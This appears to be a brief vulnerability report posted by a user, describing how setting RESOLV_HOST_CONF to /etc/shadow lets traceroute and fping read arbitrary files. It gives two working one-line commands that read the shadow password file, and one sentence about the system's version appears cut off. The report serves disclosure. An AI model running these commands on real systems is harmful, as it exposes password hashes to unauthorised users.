When checking the security of my system, I found that it is vulnerable
to the following standard attack (in tcsh syntax):
env RESOLV_HOST_CONF=/etc/shadow /usr/sbin/traceroute foobar
or env RESOLV_HOST_CONF=/etc/shadow fping foobar
This allows the user to read any (text) file on the system. My system
In other words, it is up to date according to ftp.debian.org.
Curiously, my older 486 system at home is not vulnerable to these attacks.
--Paul Vojta, email@example.com